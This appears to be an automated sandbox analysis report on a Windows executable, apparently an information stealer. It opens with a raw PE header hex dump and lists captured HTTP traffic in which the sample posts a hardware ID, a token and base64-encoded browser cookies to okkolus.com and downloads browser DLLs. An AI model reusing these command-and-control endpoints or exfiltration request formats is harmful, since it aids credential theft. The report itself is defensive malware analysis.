00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: okkolus.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"browsers------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: okkolus.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"plugins------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: okkolus.comContent-Length: 6247Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: okkolus.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file"------CGDGHCBGDHJJKECAECBA--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file"------JECBGCFHCFIDHIDHDGDG--
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASRELINKRU ASRELINKRU

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: okkolus.com

Source: unknown

Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php&)
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php/M
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpN
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpt
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpte3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dlld
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllser
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll
